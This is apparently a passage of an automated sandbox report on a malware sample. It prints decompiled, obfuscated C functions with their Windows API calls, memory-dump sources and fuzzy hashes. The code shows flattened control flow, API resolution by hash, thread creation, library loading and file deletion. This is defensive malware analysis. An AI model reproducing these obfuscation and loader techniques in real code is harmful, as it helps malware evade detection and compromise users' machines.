                                            				void* _t34;
                                            				void* _t45;
                                            				void* _t46;
                                            				void** _t47;
                                            				intOrPtr _t48;
                                            				long _t49;
                                            				void* _t52;
                                            
                                            				_t34 = __ecx;
                                            				_t45 = _v48;
                                            				_t47 = __edx;
                                            				_v64 = __ecx;
                                            				_t14 = 0x117d008;
                                            				goto L1;
                                            				do {
                                            					while(1) {
                                            						L1:
                                            						_t52 = _t14 - 0x2db2facf;
                                            						if(_t52 > 0) {
                                            							break;
                                            						}
                                            						if(_t52 == 0) {
                                            							_t47[1] = E02271E20(_t34);
                                            							_t14 = 0x379eeb54;
                                            							continue;
                                            						} else {
                                            							if(_t14 == 0x117d008) {
                                            								 *_t47 = 0;
                                            								_t14 = 0x2db2facf;
                                            								_t47[1] = 0;
                                            								continue;
                                            							} else {
                                            								if(_t14 == 0x69f96d4) {
                                            									_t45 =  *_t47;
                                            									_t14 = 0x9c0f05c;
                                            									continue;
                                            								} else {
                                            									if(_t14 != 0x9c0f05c) {
                                            										goto L18;
                                            									} else {
                                            										 *_t45 =  *_t34;
                                            										_t45 = _t45 + 4;
                                            										_t14 = 0x2e2468af;
                                            										continue;
                                            									}
                                            								}
                                            							}
                                            						}
                                            						L24:
                                            					}
                                            					if(_t14 == 0x2e2468af) {
                                            						 *_t45 =  *(_t34 + 8);
                                            						_t46 = _t45 + 4;
                                            						_t16 =  *0x227daac;
                                            						_t33 =  *(_t34 + 8);
                                            						_t48 =  *((intOrPtr*)(_t34 + 4));
                                            						if(_t16 == 0) {
                                            							_t16 = E02273E80(_t33, E02273F20(0xe66945e6), 0x70f7b8ec, _t48);
                                            							 *0x227daac = _t16;
                                            						}
                                            						 *_t16(_t46, _t48, _t33);
                                            						goto L23;
                                            					} else {
                                            						if(_t14 != 0x379eeb54) {
                                            							goto L18;
                                            						} else {
                                            							_t23 =  *0x227dea8;
                                            							_t49 = _t47[1];
                                            							if(_t23 == 0) {
                                            								_t23 = E02273E80(_t32, E02273F20(0xbb398380), 0x97f883e, _t49);
                                            								 *0x227dea8 = _t23;
                                            							}
                                            							_t32 =  *_t23();
                                            							if( *0x227dcec == 0) {
                                            								 *0x227dcec = E02273E80(_t32, E02273F20(0xbb398380), 0xe9233692, _t49);
                                            							}
                                            							_t26 = RtlAllocateHeap(_t32, 8, _t49); // executed
                                            							 *_t47 = _t26;
                                            							if(_t26 == 0) {
                                            								L23:
                                            								return 0 |  *_t47 != 0x00000000;
                                            							} else {
                                            								_t34 = _v72;
                                            								_t14 = 0x69f96d4;
                                            								goto L1;
                                            							}
                                            						}
                                            					}
                                            					goto L24;
                                            					L18:
                                            				} while (_t14 != 0x31001f6f);
                                            				return 0 |  *_t47 != 0x00000000;
                                            				goto L24;
                                            			}






















                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00000008,?,?,?,?,?,?,?,?,?,?,?,?,0227185E,?), ref: 02271F37
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true
                                            • Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2270000_sort.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID: Ei
                                            • API String ID: 1279760036-3988083245
                                            • Opcode ID: 5931c6eb5dfd71931cb1a59ce44140df3a7b9f512d8b0fe5ab8bc136a9cc8c72
                                            • Instruction ID: a7ee9aa201fc0c5544596ef23a23246a18871935c6333da773998b299e495b25
                                            • Opcode Fuzzy Hash: 5931c6eb5dfd71931cb1a59ce44140df3a7b9f512d8b0fe5ab8bc136a9cc8c72
                                            • Instruction Fuzzy Hash: 2D31D871B2C302DBE720DBF5A48422673E5FF94254B14882AE94EC7344DB75DC658B83
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 68%
                                            			E02279D70(void* __ebx) {
                                            				void* _t7;
                                            				intOrPtr* _t8;
                                            				intOrPtr* _t10;
                                            				intOrPtr* _t16;
                                            				intOrPtr _t17;
                                            				void* _t20;
                                            				void* _t25;
                                            				intOrPtr _t27;
                                            				void* _t40;
                                            				void* _t41;
                                            
                                            				_t25 = __ebx;
                                            				_t7 = 0x94e9677;
                                            				L1:
                                            				while(_t7 != 0x94e9677) {
                                            					if(_t7 == 0x11e89e6c) {
                                            						_t16 =  *0x227dc9c;
                                            						if(_t16 == 0) {
                                            							_t16 = E02273E80(_t25, E02273F20(0xbb398380), 0x2a635a2, _t41);
                                            							 *0x227dc9c = _t16;
                                            						}
                                            						_t17 =  *_t16(0, 0, 0, 0);
                                            						_t27 =  *0x227e2f0; // 0x4c2de8
                                            						 *((intOrPtr*)(_t27 + 0x3c)) = _t17;
                                            						_t7 = 0x31494004;
                                            						continue;
                                            					} else {
                                            						if(_t7 == 0x31494004) {
                                            							if( *0x227de90 == 0) {
                                            								 *0x227de90 = E02273E80(_t25, E02273F20(0xbb398380), 0x70a5bbfd, _t41);
                                            							}
                                            							_t20 = CreateThread(0, 0, E022799A0, 0, 0, 0);
                                            							_t27 =  *0x227e2f0; // 0x4c2de8
                                            							 *(_t27 + 0x34) = _t20;
                                            							L18:
                                            							return 0 | _t27 != 0x00000000;
                                            						} else {
                                            							if(_t7 != 0xf4b9f58) {
                                            								continue;
                                            							} else {
                                            								return 0 | _t27 != 0x00000000;
                                            							}
                                            						}
                                            					}
                                            					L19:
                                            				}
                                            				_t8 =  *0x227dea8;
                                            				if(_t8 == 0) {
                                            					_t8 = E02273E80(_t25, E02273F20(0xbb398380), 0x97f883e, _t41);
                                            					 *0x227dea8 = _t8;
                                            				}
                                            				_t40 =  *_t8();
                                            				_t10 =  *0x227dcec;
                                            				if(_t10 == 0) {
                                            					_t10 = E02273E80(_t25, E02273F20(0xbb398380), 0xe9233692, _t41);
                                            					 *0x227dcec = _t10;
                                            				}
                                            				_t27 =  *_t10(_t40, 8, 0x40);
                                            				 *0x227e2f0 = _t27;
                                            				if(_t27 == 0) {
                                            					goto L18;
                                            				} else {
                                            					_t7 = 0x11e89e6c;
                                            					goto L1;
                                            				}
                                            				goto L19;
                                            			}

                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,022799A0,00000000,00000000,00000000), ref: 02279E83
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true
                                            • Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2270000_sort.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID: -L
                                            • API String ID: 2422867632-3144795080
                                            • Opcode ID: e43a5aa82b583a21e02e9dc24b23373092d3ea548ac68287cf370c502ff5a542
                                            • Instruction ID: e22ca1993f26ecb34d977efe8de8a414d7f72558ceb71ca90ca7e49c80a96464
                                            • Opcode Fuzzy Hash: e43a5aa82b583a21e02e9dc24b23373092d3ea548ac68287cf370c502ff5a542
                                            • Instruction Fuzzy Hash: 9B217630B6D3026BDB54EAF5A956B6A22D2BF80644F14485DF506CB3C8EB70DC508BC6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 58%
                                            			E02275360(void* __ebx, void* __ebp) {
                                            				signed char _v2;
                                            				signed int _v276;
                                            				signed int _v280;
                                            				char _v284;
                                            				signed short _v320;
                                            				void* _t8;
                                            				intOrPtr* _t16;
                                            				intOrPtr* _t19;
                                            				void* _t22;
                                            				void* _t31;
                                            				void* _t32;
                                            				void* _t35;
                                            
                                            				_t32 = __ebp;
                                            				_t22 = __ebx;
                                            				_t8 = 0x26a841ee;
                                            				_t31 = 0;
                                            				goto L1;
                                            				do {
                                            					while(1) {
                                            						L1:
                                            						_t35 = _t8 - 0x1fae9e92;
                                            						if(_t35 > 0) {
                                            							break;
                                            						}
                                            						if(_t35 == 0) {
                                            							_t31 = _t31 + _v280 * 0x3e8;
                                            							_t8 = 0x2e629178;
                                            							continue;
                                            						} else {
                                            							if(_t8 == 0x41b9e46) {
                                            								return (_v320 & 0x0000ffff) + _t31;
                                            							} else {
                                            								if(_t8 == 0xb2cdcb1) {
                                            									_t16 =  *0x227db30;
                                            									if(_t16 == 0) {
                                            										_t16 = E02273E80(_t22, E02273F20(0xbb398380), 0xa4407471, _t32);
                                            										 *0x227db30 = _t16;
                                            									}
                                            									 *_t16( &_v320); // executed
                                            									_t8 = 0x22049820;
                                            									continue;
                                            								} else {
                                            									if(_t8 != 0x142f3962) {
                                            										goto L17;
                                            									} else {
                                            										_t19 =  *0x227dedc;
                                            										_v284 = 0x11c;
                                            										if(_t19 == 0) {
                                            											_t19 = E02273E80(_t22, E02273F20(0xe66945e6), 0x69e48357, _t32);
                                            											 *0x227dedc = _t19;
                                            										}
                                            										 *_t19( &_v284);
                                            										_t8 = 0xb2cdcb1;
                                            										continue;
                                            									}
                                            								}
                                            							}
                                            						}
                                            						L22:
                                            					}
                                            					if(_t8 == 0x22049820) {
                                            						_t31 = _t31 + (_v2 & 0x000000ff) * 0x186a0;
                                            						_t8 = 0x1fae9e92;
                                            						goto L1;
                                            					} else {
                                            						if(_t8 == 0x26a841ee) {
                                            							_t8 = 0x142f3962;
                                            							goto L1;
                                            						} else {
                                            							if(_t8 != 0x2e629178) {
                                            								goto L17;
                                            							} else {
                                            								_t31 = _t31 + _v276 * 0x64;
                                            								_t8 = 0x41b9e46;
                                            								goto L1;
                                            							}
                                            						}
                                            					}
                                            					goto L22;
                                            					L17:
                                            				} while (_t8 != 0x135ed498);
                                            				return _t31;
                                            				goto L22;
                                            			}

                                            APIs
                                            • GetNativeSystemInfo.KERNELBASE(2564BE4F,2564BE4F), ref: 02275401
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true
                                            • Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2270000_sort.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: InfoNativeSystem
                                            • String ID: Ei
                                            • API String ID: 1721193555-3988083245
                                            • Opcode ID: 6c2ffe6665a8a43180662e94d05953cf7e3e5c7e3e8c52f0b54fa07d09c14e46
                                            • Instruction ID: 97ca45d9cca7c7bc6ac67d93e4acc15950684d8749697e035875f368ed12aaf5
                                            • Opcode Fuzzy Hash: 6c2ffe6665a8a43180662e94d05953cf7e3e5c7e3e8c52f0b54fa07d09c14e46
                                            • Instruction Fuzzy Hash: CF21FD61E3C35147C6249BE998D42BFE5D15B54284FC40D3AEC49DF268DB74C9609BC3
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 71%
                                            			E02277DD0(void* __ebx, void* __edi, void* __esi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                            				char _v520;
                                            				intOrPtr* _t5;
                                            				intOrPtr* _t7;
                                            				intOrPtr* _t9;
                                            				void* _t38;
                                            				void* _t41;
                                            				void* _t44;
                                            				WCHAR* _t45;
                                            
                                            				_t43 = __ebp;
                                            				_t19 = __ebx;
                                            				_t44 =  &_v520;
                                            				_t41 = E022734C0(0x227d940);
                                            				_t5 =  *0x227dc60;
                                            				if(_t5 == 0) {
                                            					_t5 = E02273E80(__ebx, E02273F20(0xe66945e6), 0xcca28b0d, __ebp);
                                            					 *0x227dc60 = _t5;
                                            				}
                                            				 *_t5( &_v520, 0x104, _t41, _a8, _a4 + 0x2c);
                                            				_t7 =  *0x227dea8;
                                            				_t45 = _t44 + 0x14;
                                            				if(_t7 == 0) {
                                            					_t7 = E02273E80(_t19, E02273F20(0xbb398380), 0x97f883e, _t43);
                                            					 *0x227dea8 = _t7;
                                            				}
                                            				_t38 =  *_t7();
                                            				_t9 =  *0x227e1a0;
                                            				if(_t9 == 0) {
                                            					_t9 = E02273E80(_t19, E02273F20(0xbb398380), 0x26c3f343, _t43);
                                            					 *0x227e1a0 = _t9;
                                            				}
                                            				 *_t9(_t38, 0, _t41);
                                            				if( *0x227df94 == 0) {
                                            					 *0x227df94 = E02273E80(_t19, E02273F20(0xbb398380), 0x86a49eb, _t43);
                                            				}
                                            				DeleteFileW(_t45); // executed
                                            				return 1;
                                            			}

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true
                                            • Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2270000_sort.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: DeleteFile
                                            • String ID: Ei
                                            • API String ID: 4033686569-3988083245
                                            • Opcode ID: 6febd6c75edcf64da5ccb8193dabd97708ab423e583a66521245bbd25caf0ea2
                                            • Instruction ID: cd62b57a96eb8fc8921ceeb9c058d46f875eb6e5a25571dc09c44652afd85561
                                            • Opcode Fuzzy Hash: 6febd6c75edcf64da5ccb8193dabd97708ab423e583a66521245bbd25caf0ea2
                                            • Instruction Fuzzy Hash: DA117F71B29201ABD714F7F4A89977B3696AFC4284F00086CE449DB248EF308C149BA2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 66%
                                            			E02275BC0(void* __ecx, void* __edx, void* __ebp) {
                                            				intOrPtr _v0;
                                            				intOrPtr _v4;
                                            				void* __ebx;
                                            				intOrPtr* _t3;
                                            				void* _t6;
                                            				intOrPtr* _t9;
                                            				void* _t20;
                                            				void* _t21;
                                            				void* _t38;
                                            				void* _t39;
                                            				void* _t40;
                                            				void* _t41;
                                            
                                            				_t42 = __ebp;
                                            				_t3 =  *0x227dea8;
                                            				_t20 = __ecx;
                                            				_t38 = __edx;
                                            				if(_t3 == 0) {
                                            					_t3 = E02273E80(_t20, E02273F20(0xbb398380), 0x97f883e, __ebp);
                                            					 *0x227dea8 = _t3;
                                            				}
                                            				_t40 =  *_t3();
                                            				if( *0x227dcec == 0) {
                                            					 *0x227dcec = E02273E80(_t20, E02273F20(0xbb398380), 0xe9233692, _t42);
                                            				}
                                            				_t6 = RtlAllocateHeap(_t40, 8, 0x40000); // executed
                                            				_t41 = _t6;
                                            				if(_t41 == 0) {
                                            					return 0;
                                            				} else {
                                            					_push(_t41);
                                            					_push(_v0);
                                            					_push(_v4);
                                            					_t21 = E02275880(_t20, _t38);
                                            					_t9 =  *0x227dea8;
                                            					if(_t9 == 0) {
                                            						_t9 = E02273E80(_t21, E02273F20(0xbb398380), 0x97f883e, _t42);
                                            						 *0x227dea8 = _t9;
                                            					}
                                            					_t39 =  *_t9();
                                            					if( *0x227e1a0 == 0) {
                                            						 *0x227e1a0 = E02273E80(_t21, E02273F20(0xbb398380), 0x26c3f343, _t42);
                                            					}
                                            					RtlFreeHeap(_t39, 0, _t41); // executed
                                            					return _t21;
                                            				}
                                            			}

                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00000008,00040000), ref: 02275C1B
                                            • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 02275C8A
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true
                                            • Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2270000_sort.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateFree
                                            • String ID:
                                            • API String ID: 2488874121-0
                                            • Opcode ID: 206ea653176cfd22e9493a3dd9330bf6280dc33cfc92d186af52047d19637b58
                                            • Instruction ID: 90b603347a0081c8c11dd2cd359e8a05b842601ec98475fbbe68a794ffdb2a87
                                            • Opcode Fuzzy Hash: 206ea653176cfd22e9493a3dd9330bf6280dc33cfc92d186af52047d19637b58
                                            • Instruction Fuzzy Hash: 2311AC72F192026BDB14AAF8689476B62D7AFC0294B44487CF805CB348EF708C255BD2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 88%
                                            			E00412710() {
                                            				void* _t6;
                                            				void* _t7;
                                            				struct HHOOK__* _t9;
                                            				void* _t18;
                                            
                                            				_t6 = E00424BFB();
                                            				if( *((char*)(_t6 + 0x14)) == 0) {
                                            					_t7 = E004249C4();
                                            					_t9 = SetWindowsHookExA(0xffffffff, E00412A65, 0, GetCurrentThreadId()); // executed
                                            					_push(E00424441);
                                            					 *(_t7 + 0x30) = _t9;
                                            					_t18 = E00425D27(0x439c50);
                                            					if( *((intOrPtr*)(_t18 + 0x14)) != 0) {
                                            						 *((intOrPtr*)(_t18 + 0x14))( *((intOrPtr*)(E00424BFB() + 8)));
                                            					}
                                            					return E00425C92(0x439c4c, E00424456);
                                            				}
                                            				return _t6;
                                            			}








                                            APIs
                                            • GetCurrentThreadId.KERNEL32 ref: 00412723
                                            • SetWindowsHookExA.USER32 ref: 00412733
                                              • Part of subcall function 00425D27: __EH_prolog.LIBCMT ref: 00425D2C
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: CurrentH_prologHookThreadWindows
                                            • String ID:
                                            • API String ID: 2183259885-0
                                            • Opcode ID: 82dfa06e578934c154c706557db465714f2c1539f2333c53d4548f0f4d9798f3
                                            • Instruction ID: e1aa810c2eef3cfbe5d0c04a06800172916402ab6d7e5109c2f22e34ec283244
                                            • Opcode Fuzzy Hash: 82dfa06e578934c154c706557db465714f2c1539f2333c53d4548f0f4d9798f3
                                            • Instruction Fuzzy Hash: 59F020313006302BCB307B70BA0EB5A2A90DF44318F804A1BF0619A0E2CBBC8C80C7AD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0040796F(intOrPtr _a4) {
                                            				void* _t6;
                                            				void* _t9;
                                            
                                            				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                            				 *0x43b63c = _t6;
                                            				if(_t6 == 0) {
                                            					L3:
                                            					return 0;
                                            				} else {
                                            					if(E00407A4A() != 0) {
                                            						_t9 = 1;
                                            						return _t9;
                                            					} else {
                                            						HeapDestroy( *0x43b63c);
                                            						goto L3;
                                            					}
                                            				}
                                            			}






                                            APIs
                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,004063E6,00000001), ref: 00407980
                                              • Part of subcall function 00407A4A: HeapAlloc.KERNEL32(00000000,00000140,00407994), ref: 00407A57
                                            • HeapDestroy.KERNEL32 ref: 0040799E
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Heap$AllocCreateDestroy
                                            • String ID:
                                            • API String ID: 2236781399-0
                                            • Opcode ID: 645681982fc8d61ddb20c8e825624fd1c02a5afe8e3a61baadfadfb8e0cb624d
                                            • Instruction ID: 148b4dcf31a7c6b17fb8364a85278eb553451c51f0f99df079208ecffef983c8
                                            • Opcode Fuzzy Hash: 645681982fc8d61ddb20c8e825624fd1c02a5afe8e3a61baadfadfb8e0cb624d
                                            • Instruction Fuzzy Hash: 26E012B0755301AEEB101B31AC0677A36D4DB54782F149436F544D41F4E7B895519A4B
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931652161.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2241000_sort.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9545f8edc284a04ee22b93235bf47441e87eb3a6228b08b4c274475cc7a75685
                                            • Instruction ID: ff9857c0712c6e1112d8b5370d49a049735d10264352e80dd8ee9bb8213dcaa2
                                            • Opcode Fuzzy Hash: 9545f8edc284a04ee22b93235bf47441e87eb3a6228b08b4c274475cc7a75685
                                            • Instruction Fuzzy Hash: 2D41BA78A10109EFDB08CF94C494BAAB7B2FF88314F14C159E8195F359C775EA92CB80
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 85%
                                            			E02276FB0(void* __ebx) {
                                            				void* _t2;
                                            				struct HINSTANCE__* _t5;
                                            				intOrPtr* _t6;
                                            				intOrPtr* _t8;
                                            				void* _t21;
                                            				intOrPtr _t28;
                                            				void* _t48;
                                            				WCHAR* _t51;
                                            				void* _t53;
                                            				void* _t54;
                                            				void* _t55;
                                            
                                            				_t21 = __ebx;
                                            				_t2 = 0x2f7561b9;
                                            				goto L1;
                                            				do {
                                            					while(1) {
                                            						L1:
                                            						_t54 = _t2 - 0x16eb9dc5;
                                            						if(_t54 > 0) {
                                            							break;
                                            						}
                                            						if(_t54 == 0) {
                                            							E02276F10(_t21, 0x227d770, 4, __eflags);
                                            							_t2 = 0x28da268b;
                                            							continue;
                                            						} else {
                                            							_t55 = _t2 - 0x96aa655;
                                            							if(_t55 > 0) {
                                            								__eflags = _t2 - 0x129c963b;
                                            								if(__eflags != 0) {
                                            									goto L21;
                                            								} else {
                                            									E02276F10(_t21, 0x227d7c0, 3, __eflags);
                                            									_t2 = 0x16eb9dc5;
                                            									continue;
                                            								}
                                            							} else {
                                            								if(_t55 == 0) {
                                            									E02276F10(_t21, 0x227d840, 1, __eflags);
                                            									_t2 = 0x6462a46;
                                            									continue;
                                            								} else {
                                            									if(_t2 == 0x34398df) {
                                            										E02276F10(_t21, 0x227d820, 0, __eflags);
                                            										_t2 = 0x96aa655;
                                            										continue;
                                            									} else {
                                            										_t57 = _t2 - 0x6462a46;
                                            										if(_t2 != 0x6462a46) {
                                            											goto L21;
                                            										} else {
                                            											E02276F10(_t21, 0x227d890, 2, _t57);
                                            											_t2 = 0x129c963b;
                                            											continue;
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            						L30:
                                            					}
                                            					__eflags = _t2 - 0x2cd0d411;
                                            					if(__eflags > 0) {
                                            						__eflags = _t2 - 0x2f7561b9;
                                            						if(__eflags != 0) {
                                            							goto L21;
                                            						} else {
                                            							_t2 = 0x34398df;
                                            							goto L1;
                                            						}
                                            					} else {
                                            						if(__eflags == 0) {
                                            							_t51 = E022734C0(0x227d7f0);
                                            							__eflags =  *0x227ddc4;
                                            							if( *0x227ddc4 == 0) {
                                            								 *0x227ddc4 = E02273E80(_t21, E02273F20(0xbb398380), 0x9261db99, _t53);
                                            							}
                                            							_t5 = LoadLibraryW(_t51);
                                            							_t28 =  *0x227e2e8; // 0x4c3710
                                            							 *(_t28 + 0x28) = _t5;
                                            							_t6 =  *0x227dea8;
                                            							__eflags = _t6;
                                            							if(_t6 == 0) {
                                            								_t6 = E02273E80(_t21, E02273F20(0xbb398380), 0x97f883e, _t53);
                                            								 *0x227dea8 = _t6;
                                            							}
                                            							_t48 =  *_t6();
                                            							_t8 =  *0x227e1a0;
                                            							__eflags = _t8;
                                            							if(_t8 == 0) {
                                            								_t8 = E02273E80(_t21, E02273F20(0xbb398380), 0x26c3f343, _t53);
                                            								 *0x227e1a0 = _t8;
                                            							}
                                            							return  *_t8(_t48, 0, _t51);
                                            						} else {
                                            							__eflags = _t2 - 0x17b18c59;
                                            							if(__eflags == 0) {
                                            								E02276F10(_t21, 0x227d870, 6, __eflags);
                                            								_t2 = 0x2cd0d411;
                                            								goto L1;
                                            							} else {
                                            								__eflags = _t2 - 0x28da268b;
                                            								if(__eflags != 0) {
                                            									goto L21;
                                            								} else {
                                            									E02276F10(_t21, 0x227d790, 5, __eflags);
                                            									_t2 = 0x17b18c59;
                                            									goto L1;
                                            								}
                                            							}
                                            						}
                                            					}
                                            					goto L30;
                                            					L21:
                                            					__eflags = _t2 - 0x2a0eb481;
                                            				} while (__eflags != 0);
                                            				return _t2;
                                            				goto L30;
                                            			}















                                            APIs
                                            • LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,022768DC), ref: 022770F2
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true
                                            • Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2270000_sort.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 2e662c5924742044905ec9a1a0c30b9eaaacfb7378e43bb22e95fd4c41e42fac
                                            • Instruction ID: 0775aa566c03458f65ddcb663382587c7b4a1a4665f1be3c4e7d070791f95fbb
                                            • Opcode Fuzzy Hash: 2e662c5924742044905ec9a1a0c30b9eaaacfb7378e43bb22e95fd4c41e42fac
                                            • Instruction Fuzzy Hash: F631A120B3D6035BDA28AAF9689437B515B9B81244F640C6AF007CB35CDFB5CD018BE3
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 58%
                                            			E022746F0(void* __ebx, void* __edx, void* __ebp) {
                                            				char _v16;
                                            				void* __ecx;
                                            				intOrPtr* _t2;
                                            				intOrPtr* _t5;
                                            				void* _t6;
                                            				intOrPtr* _t7;
                                            				void* _t14;
                                            				void* _t27;
                                            				void* _t29;
                                            				void* _t32;
                                            				void* _t33;
                                            				intOrPtr* _t37;
                                            
                                            				_t36 = __ebp;
                                            				_t13 = __ebx;
                                            				_t2 =  *0x227dea4;
                                            				 *_t37 = 0x104;
                                            				_t32 = _t14;
                                            				_t27 = __edx;
                                            				if(_t2 == 0) {
                                            					_t2 = E02273E80(__ebx, E02273F20(0xbb398380), 0x4791debe, __ebp);
                                            					 *0x227dea4 = _t2;
                                            				}
                                            				_t33 =  *_t2(0x1000, 0, _t32);
                                            				if(_t33 == 0) {
                                            					return 0;
                                            				} else {
                                            					_t5 =  *0x227df2c;
                                            					if(_t5 == 0) {
                                            						_t5 = E02273E80(_t13, E02273F20(0xbb398380), 0xd0ee7032, _t36);
                                            						 *0x227df2c = _t5;
                                            					}
                                            					_t6 =  *_t5(_t33, 0, _t27,  &_v16); // executed
                                            					_t29 = _t6;
                                            					_t7 =  *0x227dc70;
                                            					if(_t7 == 0) {
                                            						_t7 = E02273E80(_t13, E02273F20(0xbb398380), 0x560d239b, _t36);
                                            						 *0x227dc70 = _t7;
                                            					}
                                            					 *_t7(_t33);
                                            					return _t29;
                                            				}
                                            			}
















                                            APIs
                                            • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,2564BE4F), ref: 0227475F
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true
                                            • Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2270000_sort.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FullImageNameProcessQuery
                                            • String ID:
                                            • API String ID: 3578328331-0
                                            • Opcode ID: aea155e6f094eb6659221f1e99f0ed86a9f789231878d376b312f9f35fa16965
                                            • Instruction ID: 8d1063aa29eecb05ac15ffa3f77f0ca3387fcd666b95b60f2bb2433c27ff2b15
                                            • Opcode Fuzzy Hash: aea155e6f094eb6659221f1e99f0ed86a9f789231878d376b312f9f35fa16965
